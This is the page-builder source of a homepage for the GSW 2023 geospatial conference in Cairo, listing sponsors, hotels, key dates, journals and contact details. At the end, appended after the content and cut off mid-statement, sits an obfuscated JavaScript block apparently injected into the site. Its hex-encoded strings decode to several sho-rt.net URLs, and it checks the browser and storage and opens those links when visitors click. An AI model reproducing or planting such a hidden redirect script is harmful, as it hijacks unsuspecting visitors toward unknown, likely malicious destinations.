!important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\r\n<img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\r\n<img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 